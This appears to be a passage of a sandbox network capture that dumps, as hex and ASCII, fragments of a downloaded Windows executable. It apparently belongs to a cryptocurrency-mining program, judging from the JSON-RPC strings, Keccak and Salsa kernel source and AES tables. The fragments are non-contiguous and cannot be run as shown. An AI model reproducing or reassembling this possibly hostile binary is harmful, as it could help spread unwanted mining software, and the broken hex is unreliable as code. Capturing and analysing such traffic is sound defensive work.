                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6049INData Raw: 44 0f 11 48 20 44 0f 11 40 30 0f 11 78 40 0f 11 70 50 0f 11 58 74 0f 11 a0 84 00 00 00 48 8d 05 c7 58 fc ff 48 89 44 24 28 0f 11 84 24 00 01 00 00 0f 11 84 24 10 01 00 00 0f 11 84 24 20 01 00 00 0f 11 84 24 30 01 00 00 0f 11 84 24 40 01 00 00 0f 11 84 24 50 01 00 00 66 48 0f 6e c6 0f 16 44 24 28 0f 11 44 24 50 e8 9e 8d ff ff 48 8b 93 00 01 00 00 66 0f 6e e8 48 8d 8b 30 01 00 00 66 0f 70 c5 e0 48 89 54 24 30 48 8d 54 24 30 66 0f d6 44 24 38 e8 52 b6 fc ff 48 8b 44 24 50 48 85 c0 74 0f 41 b8 03 00 00 00 4c 89 ea 4c 89 e9 ff d0 90 0f 10 b4 24 a0 01 00 00 0f 10 bc 24 b0 01 00 00 44 0f 10 84 24 c0 01 00 00 44 0f 10 8c 24 d0 01 00 00 44 0f 10 94 24 e0 01 00 00 44 0f 10 9c 24 f0 01 00 00 48 81 c4 00 02 00 00 5b 5e 41 5c 41 5d 41 5e c3 48 89 c3 4c 89 e1 e8 aa 49
                                                                                                                                                                                                                    Data Ascii: DH D@0x@pPXtHXHD$($$$ $0$@$PfHnD$(D$PHfnH0fpHT$0HT$0fD$8RHD$PHtALL$$D$D$D$D$H[^A\A]A^HLI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6065INData Raw: 44 89 e0 48 81 c4 c0 00 00 00 5b 5e 5f 5d 41 5c c3 66 2e 0f 1f 84 00 00 00 00 00 31 c0 e9 02 fe ff ff 66 0f 1f 84 00 00 00 00 00 48 8b 54 24 20 4c 8b 44 24 28 48 b8 ab aa aa aa aa aa aa aa 49 29 d0 4c 89 c1 48 c1 f9 03 48 0f af c8 31 c0 48 85 c9 0f 84 78 ff ff ff 0f 1f 00 80 7c 02 10 00 74 12 48 8b 0b f3 0f 6f 1c 02 48 01 c1 c6 41 10 01 0f 11 19 48 83 c0 18 4c 39 c0 75 de e9 4e ff ff ff 48 85 ff 79 2e e8 af 3f 01 00 0f 1f 80 00 00 00 00 48 c7 84 24 88 00 00 00 00 00 00 00 49 89 d0 31 d2 48 c7 84 24 98 00 00 00 00 00 00 00 e9 ad fe ff ff e8 41 3f 01 00 48 8d 0d 12 64 08 00 e8 25 41 01 00 48 8b 4c 24 40 49 89 c4 48 85 c9 74 05 e8 a3 ef 00 00 48 8b 4c 24 20 48 85 c9 74 05 e8 94 ef 00 00 4c 89 e1 e8 4c 1f e4 ff 48 89 c3 4c 89 e1 e8 11 07 00 00 49 89 dc eb d9
                                                                                                                                                                                                                    Data Ascii: DH[^_]A\f.1fHT$ LD$(HI)LHH1Hx|tHoHAHL9uNHy.?H$I1H$A?Hd%AHL$@IHtHL$ HtLLHLI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6081INData Raw: 00 00 48 89 83 00 01 00 00 48 83 c4 28 5b 41 5c c3 66 2e 0f 1f 84 00 00 00 00 00 31 c0 eb ad 0f 1f 40 00 31 c0 eb c0 0f 1f 40 00 31 c0 48 89 83 00 01 00 00 48 83 c4 28 5b 41 5c c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 8b 81 d8 00 00 00 48 89 91 d8 00 00 00 c3 90 56 53 48 83 ec 28 80 b9 e2 00 00 00 00 48 89 cb 89 d6 74 1c 0f b7 81 e0 00 00 00 66 89 b3 e0 00 00 00 48 83 c4 28 5b 5e c3 0f 1f 80 00 00 00 00 48 8b 89 f0 00 00 00 48 85 c9 74 20 48 8b 01 ba 20 00 00 00 ff 50 50 c6 83 e2 00 00 00 01 66 89 b3 e0 00 00 00 48 83 c4 28 5b 5e c3 e8 bf ff 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 48 83 ec 28 48 89 cb 48 89 d6 e8 df de ff ff 48 8d 93 d0 00 00 00 48 89 d9 e8 c0 fe ff ff 31 c0 c6 83 e2 00 00 00 00 66 89 83 e0 00 00 00 31 c0 48 85
                                                                                                                                                                                                                    Data Ascii: HH([A\f.1@1@1HH([A\HHVSH(HtfH([^HHt H PPfH([^VSH(HHHH1f1H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6097INData Raw: 5d 08 66 42 89 4c 68 02 49 39 d0 76 7d 0f b7 02 48 83 c2 02 49 89 54 24 10 66 83 f8 ff 74 77 4d 8b 4c 24 10 4d 3b 4c 24 18 73 10 41 0f b7 19 e9 26 ff ff ff 0f 1f 80 00 00 00 00 49 8b 04 24 4c 89 e1 ff 50 48 89 c3 e9 0e ff ff ff 0f 1f 80 00 00 00 00 45 31 c9 45 31 c0 4c 89 ea 48 89 e9 48 c7 44 24 20 01 00 00 00 e8 ae 5e fd ff 48 8b 45 00 49 8b 54 24 10 4d 8b 44 24 18 e9 6e ff ff ff b9 07 00 00 00 e9 5d ff ff ff 49 8b 04 24 4c 89 e1 ff 50 50 eb 83 ba 02 00 00 00 e9 98 fd ff ff 48 85 ff 75 f1 ba 06 00 00 00 e9 89 fd ff ff 49 8b 04 24 4c 89 e1 ff 50 48 89 c3 e9 d8 fd ff ff 49 8b 04 24 4c 89 e1 ff 50 50 48 85 ff 0f 84 60 fd ff ff e9 72 fd ff ff 48 8d 0d 6c f4 15 00 e8 07 c1 00 00 48 89 c1 31 ff 48 89 d0 48 83 e8 01 75 26 e8 24 71 00 00 49 8b 06 ba 01 00 00 00
                                                                                                                                                                                                                    Data Ascii: ]fBLhI9v}HIT$ftwML$M;L$sA&I$LPHE1E1LHHD$ ^HEIT$MD$n]I$LPPHuI$LPHI$LPPH`rHlH1HHu&$qI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6113INData Raw: 00 00 eb 86 90 90 90 90 90 90 90 53 48 83 ec 20 48 8d 05 9c e5 16 00 48 89 41 f0 48 83 c0 50 48 89 cb 48 8d 49 08 48 89 81 c0 00 00 00 48 83 e8 28 48 89 41 f8 48 8d 05 6f e4 16 00 48 89 01 e8 c7 1f fa ff 48 8d 4b 50 e8 6e 8d f9 ff 48 8b 05 a7 1a 16 00 48 8d 4b 40 48 83 c0 10 48 89 43 08 e8 06 ed fb ff 48 8d 05 27 3d 16 00 48 8d 8b c8 00 00 00 48 c7 43 f8 00 00 00 00 48 89 03 48 8d 05 3e 3c 16 00 48 89 43 f0 48 8b 05 bb 1c 16 00 48 83 c0 10 48 89 83 c8 00 00 00 48 83 c4 20 5b e9 76 65 ff ff 48 89 c1 e8 6e 31 00 00 e8 49 33 00 00 eb 90 90 90 90 90 90 90 90 53 48 83 ec 20 48 8d 05 0c 3e 16 00 48 89 01 48 8d 05 b2 3d 16 00 48 89 cb 48 8d 49 08 48 89 41 e8 48 8b 05 68 1c 16 00 48 c7 41 f0 00 00 00 00 48 83 c0 10 48 89 01 e8 24 65 ff ff 48 8d 4b f0 48 83 c4 20
                                                                                                                                                                                                                    Data Ascii: SH HHAHPHHIHH(HAHoHHKPnHHK@HHCH'=HHCHH><HCHHHH [veHn1I3SH H>HH=HHIHAHhHAHH$eHKH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6129INData Raw: 48 89 44 24 78 48 8b 05 2f 53 00 00 c7 44 24 70 68 02 15 63 48 89 84 24 88 00 00 00 48 8b 05 10 53 00 00 c7 84 24 80 00 00 00 78 00 15 63 48 89 84 24 98 00 00 00 48 8b 05 ee 52 00 00 c7 84 24 90 00 00 00 72 01 15 63 48 89 84 24 a8 00 00 00 48 8b 05 cc 52 00 00 c7 84 24 a0 00 00 00 77 02 15 63 48 89 84 24 b8 00 00 00 48 8b 05 aa 52 00 00 c7 84 24 b0 00 00 00 7a 02 15 63 c7 84 24 c0 00 00 00 64 02 15 63 48 89 84 24 c8 00 00 00 48 8b 05 7d 52 00 00 c7 84 24 d0 00 00 00 63 00 15 63 48 89 84 24 d8 00 00 00 48 8b 05 53 52 00 00 c7 84 24 e0 00 00 00 00 00 14 63 48 89 84 24 e8 00 00 00 48 8b 05 31 52 00 00 c7 84 24 f0 00 00 00 00 01 14 63 48 89 84 24 f8 00 00 00 48 8b 05 07 52 00 00 c7 84 24 00 01 00 00 00 00 16 63 48 89 84 24 08 01 00 00 48 8b 05 e5 51 00 00 c7
                                                                                                                                                                                                                    Data Ascii: HD$xH/SD$phcH$HS$xcH$HR$rcH$HR$wcH$HR$zc$dcH$H}R$ccH$HSR$cH$H1R$cH$HR$cH$HQ
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6145INData Raw: 08 00 00 00 e8 a2 b1 ff ff 4c 8d 05 6b f4 fe ff 48 8d 15 e4 df 15 00 48 89 c1 48 8b 05 0a 9d 15 00 48 83 c0 10 48 89 01 e8 fe b7 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 b9 08 00 00 00 e8 62 b1 ff ff 4c 8d 05 ab 1d fb ff 48 8d 15 94 d9 15 00 48 89 c1 48 8b 05 6a 9b 15 00 48 83 c0 10 48 89 01 e8 be b7 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 b9 08 00 00 00 e8 22 b1 ff ff 4c 8d 05 7b d1 fe ff 48 8d 15 b4 dd 15 00 48 89 c1 48 8b 05 1a 9c 15 00 48 83 c0 10 48 89 01 e8 7e b7 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 b9 08 00 00 00 e8 e2 b0 ff ff 4c 8d 05 eb d1 f8 ff 48 8d 15 94 cf 15 00 48 89 c1 48 8b 05 9a 98 15 00 48 83 c0 10 48 89 01 e8 3e b7 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 41 55 41 54
                                                                                                                                                                                                                    Data Ascii: LkHHHHHH(bLHHHjHHH("L{HHHHH~H(LHHHHH>AUAT
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6161INData Raw: 00 00 01 00 00 00 50 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 60 00 00 00 07 00 00 00 01 00 00 00 06 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 70 00 00 00 07 00 00 00 01 00 00 00 06 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 58 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: PX`XpX
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6177INData Raw: 00 00 00 8d 1a 68 40 01 00 00 00 a8 1a 68 40 01 00 00 00 aa c0 00 03 00 01 00 00 10 00 00 00 00 00 01 00 40 00 00 00 03 03 00 00 03 03 00 00 fd fe 00 00 fd fe 00 00 28 00 00 00 04 04 00 00 80 00 00 00 80 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 c7 1a 68 40 01 00 00 00 e0 1a 68 40 01 00 00 00 ab c0 00 03 00 01 00 00 10 00 00 00 00 00 02 00 40 00 00 00 03 03 00 00 03 03 00 00 fd fe 00 00 fd fe 00 00 28 00 00 00 04 04 00 00 00 01 00 00 00 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ff 1a 68 40 01 00 00 00 18 1b 68 40 01 00 00 00 ac c0 00 03 04 00 00 00 08 00 00 00 00 40 00 00 40 00 00 00 03 03 00 00 03 03 00 00 fd fe 00 00 fd fe 00 00 28 00 00 00 04 04 00 00 80 00 00 00 80 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 39 1b 68 40 01 00 00 00 50 1b 68 40
                                                                                                                                                                                                                    Data Ascii: h@h@@(h@h@@(h@h@@@(9h@Ph@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6193INData Raw: 00 00 00 c6 53 6c 40 01 00 00 00 00 40 07 00 00 00 00 00 d9 53 6c 40 01 00 00 00 00 10 07 00 00 00 00 00 da 53 6c 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 2a 40 01 00 00 00 a0 0b 2a 40 01 00 00 00 00 00 00 00 00 00 00 00 f0 0c 2a 40 01 00 00 00 30 0b 2a 40 01 00 00 00 20 0c 2a 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 2a 40 01 00 00 00 a0 0b 2a 40 01 00 00 00 00 00 00 00 00 00 00 00 60 0c 2a 40 01 00 00 00 30 0b 2a 40
                                                                                                                                                                                                                    Data Ascii: Sl@@Sl@Sl@ *@*@*@0*@ *@*@*@`*@0*@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6209INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6225INData Raw: 64 20 72 65 71 75 65 73 74 00 70 61 72 73 65 20 65 72 72 6f 72 00 73 74 61 74 75 73 00 72 65 73 75 6c 74 00 70 61 72 61 6d 73 00 4f 4b 00 6d 65 74 68 6f 64 00 6a 73 6f 6e 72 70 63 00 69 64 00 32 2e 30 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 1b 5b 31 3b 33 30 6d 2e 25 30 33 64 1b 5b 30 6d 5d 20 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 65 72 61 73 65 00 00 00 00 00 00 25 73 3a 20 5f 5f 70 6f 73 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 20 3e 20 74 68 69 73 2d 3e 73 69 7a 65 28 29 20 28 77 68 69 63 68 20 69 73 20 25 7a 75 29 00 1b 5b 00 00 00 00 00 00 00 62 61 73 69 63 5f 73 74 72 69 6e 67
                                                                                                                                                                                                                    Data Ascii: d requestparse errorstatusresultparamsOKmethodjsonrpcid2.0[%d-%02d-%02d %02d:%02d:%02d[1;30m.%03d[0m] basic_string::erase%s: __pos (which is %zu) > this->size() (which is %zu)[basic_string
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6241INData Raw: 78 20 73 65 6e 64 20 62 75 66 66 65 72 20 73 69 7a 65 20 65 78 63 65 65 64 65 64 3a 20 25 7a 75 22 1b 5b 30 6d 00 00 5c 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 54 2a f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff e4 2a f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 5c 2b f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff 24 29 f0 ff d4 2b f0 ff 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 2e 00 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 69 73 20 65 6d 70 74 79 2e 00 00 00 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 72 6f 6f 74 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 66 6f 6c 6c 6f 77 65 64 20 62 79 20 6f 74
                                                                                                                                                                                                                    Data Ascii: x send buffer size exceeded: %zu"[0m\)$)$)$)$)$)$)$)$)$)$)T*$)$)$)$)$)$)$)*$)$)$)$)$)\+$)$)$)$)$)$)+Unknown error.The document is empty.The document root must not be followed by ot
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6257INData Raw: e9 94 00 1a 70 33 00 c1 c1 09 ff 0f 87 f9 00 96 e3 82 00 cc 00 db 01 18 f2 cd 00 ee d0 75 ff 16 f4 70 00 1a e5 22 00 25 50 bc ff 26 2d ce fe f0 5a e1 ff 1d 03 2f ff 2a e0 4c 00 ba f3 a7 00 20 84 0f ff 05 33 7d 00 8b 87 18 00 06 f1 db 00 ac e5 85 ff f6 d6 32 00 e7 0b cf ff bf 7e 53 01 b4 a3 aa ff f5 38 18 01 b2 a4 d3 ff 03 10 ca 01 62 39 76 ff 8d 83 59 fe 21 33 18 00 f3 95 5b ff fd 34 0e 00 23 a9 43 fe 31 1e 58 ff b3 1b 24 ff a5 8c b7 00 3a bd 97 00 58 1f 00 00 4b a9 42 00 42 65 c7 ff 18 d8 c7 01 79 c4 1a ff 0e 4f cb fe f0 e2 51 ff 5e 1c 0a ff 53 c1 f0 ff cc c1 83 ff 5e 0f 56 00 da 28 9d 00 33 c1 d1 00 00 f2 b1 00 66 b9 f7 00 9e 6d 74 00 26 87 5b 00 df af 95 00 dc 42 01 ff 56 3c e8 00 19 60 25 ff e1 7a a2 01 d7 bb a8 ff 9e 9d 2e 00 38 ab a2 00 e8 f0 65 01
                                                                                                                                                                                                                    Data Ascii: p3up"%P&-Z/*L 3}2~S8b9vY!3[4#C1X$:XKBBeyOQ^S^V(3fmt&[BV<`%z.8e
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6273INData Raw: 81 6d 00 7a 68 e4 fe aa f2 cb 00 f2 cc 87 ff ca 1c e9 ff 41 06 7f 00 9f 90 47 00 64 8c 5f 00 4e 96 0d 00 fb 6b 76 01 b6 3a 7d ff 01 26 6c ff 8d bd d1 ff 08 9b 7d 01 71 a3 5b ff 79 4f be ff 86 ef 6c ff 4c 2f f8 00 a3 e4 ef 00 11 6f 0a 00 58 95 4b ff d7 eb ef 00 a7 9f 18 ff 2f 97 6c ff 6b d1 bc 00 e9 e7 63 fe 1c ca 94 ff ae 23 8a ff 6e 18 44 ff 02 45 b5 00 6b 66 52 00 66 ed 07 00 5c 24 ed ff dd a2 53 01 37 ca 06 ff 87 ea 87 ff 18 fa de 00 41 5e a8 fe f5 f8 d2 ff a7 6c c9 fe ff a1 6f 00 cd 08 fe 00 88 0d 74 00 64 b0 84 ff 2b d7 7e ff b1 85 82 ff 9e 4f 94 00 43 e0 25 01 0c ce 15 ff 3e 22 6e 01 ed 68 af ff 50 84 6f ff 8e ae 48 00 54 e5 b4 fe 69 b3 8c 00 40 f8 0f ff e9 8a 10 00 f5 43 7b fe da 79 d4 ff 3f 5f da 01 d5 85 89 ff 8f b6 52 ff 30 1c 0b 00 f4 72 8d 01
                                                                                                                                                                                                                    Data Ascii: mzhAGd_Nkv:}&l}q[yOlL/oXK/lkc#nDEkfRf\$S7A^lotd+~OC%>"nhPoHTi@C{y?_R0r
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6289INData Raw: 22 22 22 22 22 22 22 22 22 22 22 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 62 61 73 69 63 5f 73 74 72 69 6e 67 3a 3a 5f 4d 5f 63 6f 6e 73 74 72 75 63 74 20 6e 75 6c 6c 20 6e 6f 74 20 76 61 6c 69 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c d7 f0 ff 3c db f0 ff ec d7 f0 ff 64 d8 f0 ff ac d3 f0 ff 6c d4 f0 ff 73 74 61 74 75 73 00 65 72 72 6f 72 00 00 00 00 00 00 00 00 fe 79 9f 50 13 44 d3 3f 00 00 00 00 00 b0 75 40 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 06 00 00 00
                                                                                                                                                                                                                    Data Ascii: """""""""""\\\\\\\\\\\\\\\\basic_string::_M_construct null not valid\<dlstatuserroryPD?u@""""""""""""""""\\\\\\\\\\\\\\\\
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6305INData Raw: 61 6b 5c 8a f8 af c0 60 fd 83 b7 11 11 89 b4 dc ae 40 c8 64 aa 4d 19 23 7b d3 27 b2 0f a7 50 7d ca f5 03 06 b2 26 62 f3 68 2d 30 6f 93 1e ff cd 85 40 28 5f c3 8c 76 51 9e d5 06 32 d6 35 83 f6 3b 54 4f a1 9c 13 d8 c4 0e 01 2f 29 db 8c 1c b7 06 86 79 6d ff 9f 89 3b 3a a5 79 e7 81 4e 2a bd 62 c1 1b 7c b9 33 7b ee 95 80 b3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 29 d0 c4 af dc 63 9b 65 53 b1 c8 37 35 11 4c 5d 77 16 21 42 97 5c b8 50 c0 a5 1f 64 07 bd 33 f1 c9 98 40 42 de 39 d1 ba 2d ad ec fe ea d8 46 56 1c 32 90
                                                                                                                                                                                                                    Data Ascii: ak\`@dM#{'P}&bh-0o@(_vQ25;TO/)ym;:yN*b|3{)ceS75L]w!B\Pd3@B9-FV2
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6321INData Raw: 39 29 29 3b 0a 78 39 3d 58 4f 52 28 20 78 39 2c 52 4f 54 41 54 45 28 50 4c 55 53 28 20 78 38 2c 78 31 31 29 2c 31 33 29 29 3b 0a 78 31 30 3d 58 4f 52 28 78 31 30 2c 52 4f 54 41 54 45 28 50 4c 55 53 28 20 78 39 2c 78 38 29 2c 31 38 29 29 3b 0a 78 31 32 3d 58 4f 52 28 78 31 32 2c 52 4f 54 41 54 45 28 50 4c 55 53 28 78 31 35 2c 78 31 34 29 2c 37 29 29 3b 0a 78 31 33 3d 58 4f 52 28 78 31 33 2c 52 4f 54 41 54 45 28 50 4c 55 53 28 78 31 32 2c 78 31 35 29 2c 39 29 29 3b 0a 78 31 34 3d 58 4f 52 28 78 31 34 2c 52 4f 54 41 54 45 28 50 4c 55 53 28 78 31 33 2c 78 31 32 29 2c 31 33 29 29 3b 0a 78 31 35 3d 58 4f 52 28 78 31 35 2c 52 4f 54 41 54 45 28 50 4c 55 53 28 78 31 34 2c 78 31 33 29 2c 31 38 29 29 3b 0a 7d 0a 6f 75 74 70 75 74 5b 30 5d 3d 50 4c 55 53 28 78 30 2c
                                                                                                                                                                                                                    Data Ascii: 9));x9=XOR( x9,ROTATE(PLUS( x8,x11),13));x10=XOR(x10,ROTATE(PLUS( x9,x8),18));x12=XOR(x12,ROTATE(PLUS(x15,x14),7));x13=XOR(x13,ROTATE(PLUS(x12,x15),9));x14=XOR(x14,ROTATE(PLUS(x13,x12),13));x15=XOR(x15,ROTATE(PLUS(x14,x13),18));}output[0]=PLUS(x0,
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6337INData Raw: 5f 6c 6f 63 61 6c 20 75 69 6e 74 36 34 5f 74 20 44 5b 32 35 5d 3b 0a 41 5b 74 5d 3d 30 3b 0a 63 6f 6e 73 74 20 75 69 6e 74 33 32 5f 74 20 77 6f 72 64 73 3d 69 6e 70 75 74 5f 73 69 7a 65 2f 73 69 7a 65 6f 66 28 75 69 6e 74 36 34 5f 74 29 3b 0a 63 6f 6e 73 74 20 75 69 6e 74 33 32 5f 74 20 74 61 69 6c 5f 73 69 7a 65 3d 69 6e 70 75 74 5f 73 69 7a 65 20 25 20 73 69 7a 65 6f 66 28 75 69 6e 74 36 34 5f 74 29 3b 0a 75 69 6e 74 33 32 5f 74 20 77 6f 72 64 49 6e 64 65 78 3d 30 3b 0a 66 6f 72 20 28 75 69 6e 74 33 32 5f 74 20 69 3d 30 3b 20 69 3c 77 6f 72 64 73 3b 20 2b 2b 69 2c 2b 2b 69 6e 70 75 74 29 0a 7b 0a 41 5b 77 6f 72 64 49 6e 64 65 78 5d 20 5e 3d 20 2a 69 6e 70 75 74 3b 0a 2b 2b 77 6f 72 64 49 6e 64 65 78 3b 0a 69 66 28 77 6f 72 64 49 6e 64 65 78 3d 3d 31 37
                                                                                                                                                                                                                    Data Ascii: _local uint64_t D[25];A[t]=0;const uint32_t words=input_size/sizeof(uint64_t);const uint32_t tail_size=input_size % sizeof(uint64_t);uint32_t wordIndex=0;for (uint32_t i=0; i<words; ++i,++input){A[wordIndex] ^= *input;++wordIndex;if(wordIndex==17
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6353INData Raw: 36 61 36 61 64 34 62 65 55 2c 30 78 63 62 63 62 38 64 34 36 55 2c 30 78 62 65 62 65 36 37 64 39 55 2c 30 78 33 39 33 39 37 32 34 62 55 2c 0a 30 78 34 61 34 61 39 34 64 65 55 2c 30 78 34 63 34 63 39 38 64 34 55 2c 30 78 35 38 35 38 62 30 65 38 55 2c 30 78 63 66 63 66 38 35 34 61 55 2c 0a 30 78 64 30 64 30 62 62 36 62 55 2c 30 78 65 66 65 66 63 35 32 61 55 2c 30 78 61 61 61 61 34 66 65 35 55 2c 30 78 66 62 66 62 65 64 31 36 55 2c 0a 30 78 34 33 34 33 38 36 63 35 55 2c 30 78 34 64 34 64 39 61 64 37 55 2c 30 78 33 33 33 33 36 36 35 35 55 2c 30 78 38 35 38 35 31 31 39 34 55 2c 0a 30 78 34 35 34 35 38 61 63 66 55 2c 30 78 66 39 66 39 65 39 31 30 55 2c 30 78 30 32 30 32 30 34 30 36 55 2c 30 78 37 66 37 66 66 65 38 31 55 2c 0a 30 78 35 30 35 30 61 30 66 30 55 2c
                                                                                                                                                                                                                    Data Ascii: 6a6ad4beU,0xcbcb8d46U,0xbebe67d9U,0x3939724bU,0x4a4a94deU,0x4c4c98d4U,0x5858b0e8U,0xcfcf854aU,0xd0d0bb6bU,0xefefc52aU,0xaaaa4fe5U,0xfbfbed16U,0x434386c5U,0x4d4d9ad7U,0x33336655U,0x85851194U,0x45458acfU,0xf9f9e910U,0x02020406U,0x7f7ffe81U,0x5050a0f0U,
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC6369INData Raw: 33 64 55 2c 30 78 66 39 61 65 31 31 33 32 55 2c 30 78 32 39 63 37 36 64 61 31 55 2c 0a 30 78 39 65 31 64 34 62 32 66 55 2c 30 78 62 32 64 63 66 33 33 30 55 2c 30 78 38 36 30 64 65 63 35 32 55 2c 30 78 63 31 37 37 64 30 65 33 55 2c 0a 30 78 62 33 32 62 36 63 31 36 55 2c 30 78 37 30 61 39 39 39 62 39 55 2c 30 78 39 34 31 31 66 61 34 38 55 2c 30 78 65 39 34 37 32 32 36 34 55 2c 0a 30 78 66 63 61 38 63 34 38 63 55 2c 30 78 66 30 61 30 31 61 33 66 55 2c 30 78 37 64 35 36 64 38 32 63 55 2c 30 78 33 33 32 32 65 66 39 30 55 2c 0a 30 78 34 39 38 37 63 37 34 65 55 2c 30 78 33 38 64 39 63 31 64 31 55 2c 30 78 63 61 38 63 66 65 61 32 55 2c 30 78 64 34 39 38 33 36 30 62 55 2c 0a 30 78 66 35 61 36 63 66 38 31 55 2c 30 78 37 61 61 35 32 38 64 65 55 2c 30 78 62 37 64 61
